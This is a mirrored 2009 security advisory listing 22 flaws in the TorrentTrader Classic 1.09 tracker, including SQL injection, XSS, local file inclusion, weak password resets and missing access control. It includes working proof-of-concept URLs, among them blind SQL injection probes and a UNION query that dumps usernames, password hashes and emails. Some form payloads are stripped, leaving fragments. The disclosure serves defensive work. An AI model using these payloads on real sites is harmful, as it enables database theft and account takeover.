AOH :: HP Unsorted M :: BT-21166.HTM

Multiple Vulnerabilities in TorrentTrader Classic 1.09



- Multiple Vulnerabilities in TorrentTrader Classic 1.09
- Multiple Vulnerabilities in TorrentTrader Classic 1.09



[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Date: 15. June 2009=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-74.html=0D 
=0D
=0D
Description of vulnerable software:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
TorrentTrader is a feature packed and highly customisable PHP/MySQL Based=0D
BitTorrent tracker. Featuring integrated forums and plenty of administration=0D
options. Please visit www.torrenttrader.org for the support forums.=0D 
=0D
http://sourceforge.net/projects/torrenttrader =0D 
=0D
=0D
List of found vulnerabilities=0D
================================================================================0D
=0D
1. Sql Injection vulnerability in "account-inbox.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. unsanitized user submitted parameter "origmsg" is used in sql query=0D
Preconditions:=0D
  1. attacker must be logged in as valid user=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes=0D 
=0D
Result: "MYSQL Error has occurred!"=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if ($msg) {=0D
  $msg = trim($msg);=0D
=0D
  $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");=0D
  $user = mysql_fetch_assoc($res);=0D
  if (!$user)=0D
    $message = "Username not found.";=0D
...=0D
=0D
    if ($origmsg && $delete == "yes")=0D
       mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
2. Weak password generation algorithm in "account-recover.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. generated password is weak and can be easily bruteforced=0D
Preconditions:=0D
  1. attacker must know email address associated with target's account=0D
=0D
Torrenttrader contains password reseting functionality:=0D
=0D
http://localhost/torrenttrader109/account-recover.php=0D 
=0D
Anyone can initiate password reset, only condition is, that target's email=0D
address must be know. Torrenttrader will check email address and after successful=0D
validation new, temporal password will be generated and sent to that email address.=0D
Specific autogenerated password appears to be random number between 10000 and 50000,=0D
so basically there can be only 40000 possible temporal passwords. It's easy to=0D
write bruteforce script, which will try all possible password combinations.=0D
This process can take couple of hours or more, but eventually the password will=0D
be guessed and target account becomes compromised.=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {=0D
  $email = trim($_POST["email"]);=0D
  if (!validemail($email)) {=0D
	$msg = "" . NOT_VAILD_EMAIL . "";=0D
	$kind = "Error";=0D
  }=0D
  else {=0D
	  $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");=0D
	  $arr = mysql_fetch_assoc($res);=0D
=0D
	  if (!$arr) {=0D
	    $msg = "" . EMAIL_INVALID . "";=0D
	    $kind = "Error";=0D
	  }=0D
...=0D
	  if ($arr) {=0D
	  	$newpassword = rand(10000, 50000);=0D
	  	$md5pass = md5($newpassword);=0D
-----------------------------[source code end]---------------------------------=0D
=0D
=0D
3. Unauthorized database backup vulnerability in "backup-database.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. missing access control=0D
Preconditions:=0D
  1. mysqldump utility must be available=0D
  2. gzip utility must be available=0D
  3. target directory must be writable=0D
  4. database name must be known in order to successfully guess archive filename=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/backup-database.php=0D 
=0D
Resulting message: "Database backup successful, entry inserted into database."=0D
=0D
-----------------------------[source code start]-------------------------------=0D
system(sprintf(    =0D
  'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',                                    =0D
  $host,=0D
  $user,=0D
  $pass,=0D
  $db,=0D
  getenv('DOCUMENT_ROOT'),=0D
  $backupdir,=0D
  $db,=0D
  $day,=0D
  $month,=0D
  $year=0D
 )); =0D
-----------------------------[source code end]---------------------------------=0D
=0D
Attacker is able to create database backup and resulting "gz" archive's=0D
filename can be guessed, if attacker knows database name. This file is also=0D
directly downloadable from website. Example download URI:=0D
=0D
http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz=0D 
=0D
As result information leakage exists. For example, attacker can fetch admin=0D
credentials from backed up database.=0D
=0D
=0D
4. Sql Injection vulnerability in "browse.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. uninitialized variable "wherecatin" is used in sql query=0D
Preconditions:=0D
  1. none=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=waraxe=0D 
=0D
Result:=0D
=0D
Unknown column 'waraxe' in 'where clause'=0D
=0D
-----------------------------[source code start]-------------------------------=0D
if (count($wherecatina) > 1)=0D
$wherecatin = implode(",",$wherecatina);=0D
elseif (count($wherecatina) == 1)=0D
$wherea[] = "category = $wherecatina[0]";=0D
...=0D
if ($wherecatin)=0D
$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";=0D
=0D
if ($where != "")=0D
$where = "WHERE $where";=0D
=0D
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());=0D
-----------------------------[source code end]---------------------------------=0D
=0D
This specific sql injection vulneraility can be exploited using blind attack=0D
methods. If there is one or more active torrents in database, then usable is=0D
attack pattern below:=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1=0D 
=0D
and we see found torrents.=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1=0D 
=0D
"No torrents were found based on your search criteria."=0D
=0D
In this way attacker is able to ask boolean questions from database and retrieve=0D
needed information bit by bit - example of classical blind sql injection.=0D
=0D
If there is no active torrents in database, then induced sql errors method can be used.=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1=0D 
=0D
"Subquery returns more than 1 row"=0D
=0D
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1=0D 
=0D
"No torrents were found based on your search criteria."=0D
=0D
=0D
5. Information leakage in "check.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. missing access control=0D
Preconditions:=0D
  1. none=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/check.php=0D 
=0D
This script is originally meant to be used by installer and lately by admins.=0D
Because of lacking access control attacker is able to use it for gathering some=0D
useful information about target system - full path to webroot, file and directory=0D
permissions of specific files, couple of php settings.=0D
=0D
6. Sql Injection vulnerability in "delreq.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. unsanitized user submitted parameter "categ" is used in sql query=0D
Preconditions:=0D
  1. attacker must have at least super moderator privileges (user class > 3)=0D
Comments:=0D
  1. very easy to exploit=0D
=0D
Test:=0D
=0D
http://localhost/torrenttrader109/delreq.php?categ=waraxe=0D 
=0D
Result:=0D
=0D
You have an error in your SQL syntax; check the manual that corresponds to your=0D
MySQL server version for the right syntax to use near=0D
'waraxe order by requests.request LIMIT 0,50' at line 1=0D
=0D
Test 2:=0D
=0D
http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+=0D 
=0D
and we can see all usernames, password hashes and emails from database.=0D
=0D
=0D
7. Sql Injection vulnerability in "index.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Reasons:=0D
  1. unsanitized user submitted parameter "choice" is used in sql query=0D
Preconditions:=0D
  1. attacker must be logged in as valid user=0D
  2. there must exist at least one poll=0D
=0D
Testing needs custom written html form:=0D
-------------------------------------------------------------------------------=0D
=0D
action="http://localhost/torrenttrader109/index.php" method="post">=0D =0D =0D
=0D -------------------------------------------------------------------------------=0D =0D Result: "MYSQL Error has occurred!"=0D =0D -----------------------------[source code start]-------------------------------=0D if ($_SERVER["REQUEST_METHOD"] == "POST")=0D {=0D $choice = $_POST["choice"];=0D if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))=0D {=0D $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();=0D $arr = mysql_fetch_assoc($res) or die("No poll");=0D $pollid = $arr["id"];=0D $userid = $CURUSER["id"];=0D $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();=0D $arr = mysql_fetch_assoc($res);=0D if ($arr) die("Dupe vote");=0D mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 8. Sql Injection vulnerability in "modrules.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "id" is used in sql query=0D Preconditions:=0D 1. attacker must have at least moderator privileges=0D =0D Testing needs custom written html form:=0D -------------------------------------------------------------------------------=0D
=0D
action="http://localhost/torrenttrader109/modrules.php?act=edited" method="post">=0D =0D =0D =0D =0D =0D =0D
=0D -------------------------------------------------------------------------------=0D =0D Test result: "MYSQL Error has occurred!"=0D =0D -----------------------------[source code start]-------------------------------=0D elseif ($_GET["act"]=="edited"){=0D $id = $_POST["id"];=0D $title = sqlesc($_POST["title"]);=0D $text = sqlesc($_POST["text"]);=0D $public = sqlesc($_POST["public"]);=0D $class = sqlesc($_POST["class"]);=0D mysql_query("update rules set title=$title, text=$text, public=$public,=0D class=$class where id=$id") or sqlerr(__FILE__,__LINE__);=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 9. Information leakage in "phpinfo.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. missing access control=0D Preconditions:=0D 1. none=0D =0D Test:=0D =0D http://localhost/torrenttrader109/phpinfo.php=0D =0D -----------------------------[source code start]-------------------------------=0D =0D -----------------------------[source code end]---------------------------------=0D =0D This script can be used by attacker to obtain information from php function=0D phpinfo(). Access to such script must be limited to admins, but currently there=0D is not any access control at all.=0D =0D =0D 10. Sql Injection vulnerabilities in "report.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "user" is used in sql query=0D 2. unsanitized user submitted parameter "torrent" is used in sql query=0D 3. unsanitized user submitted parameter "forumid" is used in sql query=0D 4. unsanitized user submitted parameter "forumpost" is used in sql query=0D Preconditions:=0D 1. attacker must be logged in as valid user=0D =0D Two proof-of-concept tests below are using parameter "user".=0D =0D Test 1 needs custom written html form:=0D -------------------------------------------------------------------------------=0D
=0D
action="http://localhost/torrenttrader109/report.php" method="post">=0D =0D =0D =0D
=0D -------------------------------------------------------------------------------=0D =0D Test result: "MYSQL Error has occurred!"=0D =0D Test 2 needs custom written html form:=0D -----------------------------[source code start]-------------------------------=0D
=0D
action="http://localhost/torrenttrader109/report.php" method="post">=0D =0D =0D =0D
=0D -----------------------------[source code end]---------------------------------=0D =0D Test result: "You have already reported user ..."=0D =0D It's classical blind sql injection exploitation method and allows attacker to=0D fetch information from database bit by bit by asking boolean questions.=0D =0D Other three sql injection vulnerabilities in "report.php" involve user submitted=0D parameters "torrent", "forumid" and "forumpost" and exploitation can be done in=0D similar way as seen above.=0D =0D =0D 11. Sql Injection vulnerability in "take-deletepm.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "delmp" is used in sql query=0D Preconditions:=0D 1. attacker must have admin privileges=0D =0D -----------------------------[source code start]-------------------------------=0D if(isset($_POST["delmp"])) {=0D $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";=0D $res=mysql_query($do)=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 12. Sql Injection vulnerability in "takedelreport.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "delreport" is used in sql query=0D Preconditions:=0D 1. attacker must have at least moderator privileges=0D =0D -----------------------------[source code start]-------------------------------=0D jmodonly();=0D =0D $res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 =0D AND id IN (" . implode(", ", $_POST[delreport]) . ")");=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 13. Sql Injection vulnerability in "takedelreq.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "delreq" is used in sql query=0D Preconditions:=0D 1. attacker must be logged in as valid user=0D =0D -----------------------------[source code start]-------------------------------=0D if (get_user_class() > UC_JMODERATOR){=0D ...=0D $do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";=0D $do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";=0D $res2=mysql_query($do2);=0D $res=mysql_query($do);=0D ...=0D } else {=0D foreach ($_POST[delreq] as $del_req){=0D $delete_ok = checkRequestOwnership($CURUSER[id],$del_req);=0D if ($delete_ok){=0D $do="DELETE FROM requests WHERE id IN ($del_req)";=0D $do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";=0D ...=0D function checkRequestOwnership ($user, $delete_req){=0D $query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();=0D -----------------------------[source code end]---------------------------------=0D =0D =0D =0D 14. Sql Injection vulnerability in "takestaffmess.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "clases" is used in sql query=0D Preconditions:=0D 1. attacker must have admin privileges=0D =0D -----------------------------[source code start]-------------------------------=0D adminonly();=0D ...=0D $updateset = $_POST['clases'];=0D =0D $query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 15. Sql Injection vulnerability in "takewarndisable.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameter "warndisable" is used in sql query=0D Preconditions:=0D 1. attacker must have at least moderator privileges=0D =0D -----------------------------[source code start]-------------------------------=0D jmodonly();=0D ...=0D if ($disable != '') {=0D $do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";=0D $res=mysql_query($do);=0D }=0D =0D if ($enable != '') {=0D $do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";=0D $res = mysql_query($do);=0D }=0D -----------------------------[source code end]---------------------------------=0D =0D =0D 16. Sql Injection vulnerability in "today.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. uninitialized variable "limit" is used in sql query=0D Preconditions:=0D 1. none=0D Comments:=0D 1. seems hard to exploit=0D =0D Test:=0D =0D http://localhost/torrenttrader109/today.php?limit=waraxe=0D =0D Result: =0D =0D "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result=0D resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21"=0D =0D =0D 17. Sql Injection vulnerability in "torrents-details.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. uninitialized variable "where" is used in sql query=0D Preconditions:=0D 1. none=0D =0D -----------------------------[source code start]-------------------------------=0D //speed mod=0D $resSpeed = mysql_query("SELECT seeders,leechers FROM torrents=0D WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")=0D or sqlerr(__FILE__, __LINE__); =0D -----------------------------[source code end]---------------------------------=0D =0D Exploitation is possible using blind sql injection methods.=0D =0D Test 1:=0D =0D http://localhost/torrenttrader109/torrents-details.php?id=1&=0D where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+=0D =0D Result: normal page=0D =0D Test 2:=0D =0D http://localhost/torrenttrader109/torrents-details.php?id=1&=0D where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+=0D =0D Result: "MYSQL Error has occurred!"=0D =0D =0D 18. Sql Injection vulnerability in "admin-delreq.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. uninitialized variable "categ" is used in sql query=0D Preconditions:=0D 1. attacker must have at least moderator privileges=0D =0D -----------------------------[source code start]-------------------------------=0D jmodonly();=0D ...=0D $res=mysql_query("SELECT users.username, requests.filled, requests.filledby,=0D requests.id, requests.userid, requests.request, requests.added, categories.name=0D as cat FROM requests inner join categories on requests.cat = categories.id=0D inner join users on requests.userid = users.id=0D $categ order by requests.request $limit") or print(mysql_error());=0D -----------------------------[source code end]---------------------------------=0D =0D Test:=0D =0D http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe=0D =0D Result: "You have an error in your SQL syntax; check the manual that corresponds=0D to your MySQL server version for the right syntax to use=0D near 'waraxe order by requests.request LIMIT 0,50' at line 1"=0D =0D =0D 19. Persistent XSS in "viewrequests.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameters used in response html generation=0D Preconditions:=0D 1. attacker must be logged in as valid user=0D =0D Steps for testing:=0D =0D a) attacker submits request:=0D =0D http://localhost/torrenttrader109/requests.php=0D =0D In "Title" field let's insert some javascript:=0D =0D testtitle=0D =0D b) admin will browse requests:=0D =0D http://localhost/torrenttrader109/viewrequests.php=0D =0D and previously planted javascript will be executed in admin session context.=0D =0D =0D =0D 20. Persistent XSS in logging funtionality=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. unsanitized user submitted parameters used in response html generation=0D Preconditions:=0D 1. attacker must be logged in as valid user=0D =0D Steps for testing:=0D =0D a) attacker uploads torrent file:=0D =0D http://localhost/torrenttrader109/torrents-upload.php=0D =0D In "Torrent Name" field let's insert some javascript:=0D =0D testname=0D =0D Upload is successful: "The torrent has been uploaded successfully!"=0D =0D b) admin will browse logs:=0D =0D http://localhost/torrenttrader109/admin.php?act=view_log=0D =0D and previously planted javascript will be executed in admin session context.=0D =0D =0D 21. Local File Inclusion vulnerability in "backend/admin-functions.php"=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Reasons:=0D 1. URI case-insensitivity on Windows platform=0D Preconditions:=0D 1. Windows platform=0D 2. register_globals=on=0D 3. magic_quotes_gpc=off=0D =0D -----------------------------[source code start]-------------------------------=0D if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;=0D require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");=0D -----------------------------[source code end]---------------------------------=0D =0D As we can see from source code snippet above, direct access to script is blocked.=0D In case of Windows and Apache combination URI handling is case-insensitive.=0D In other hand "strpos()" function, used for access control, is case-sensitive.=0D So this script can be directly executed, if we change some characters in script's=0D filename to uppercase:=0D =0D http://localhost/torrenttrader109/backend/Admin-functions.php=0D =0D "Warning: require_once(./themes//block.php) [function.require-once]:=0D failed to open stream: No such file or directory in=0D C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"=0D =0D If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:=0D =0D http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00=0D =0D =0D 22. Reflected XSS in multiple scripts=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Examples:=0D =0D http://localhost/torrenttrader109/themes/default/footer.php?ttversion==0D =0D">http://localhost/torrenttrader109/themes/default/header.php?SITENAME=">=0D http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]==0D http://localhost/torrenttrader109/visitorstoday.php?todayactive==0D http://localhost/torrenttrader109/visitorsnow.php?activepeople==0D http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1=0D =0D">http://localhost/torrenttrader109/torrents-details.php?id=1&keepget=">=0D =0D =0D Greetings:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,=0D to all active waraxe.us forum members and to anyone else who know me!=0D =0D =0D Contact:=0D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D =0D come2waraxe@yahoo.com=0D Janek Vind "waraxe"=0D =0D Waraxe forum: http://www.waraxe.us/forums.html=0D Personal homepage: http://www.janekvind.com/=0D ---------------------------------- [ EOF ] ------------------------------------=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.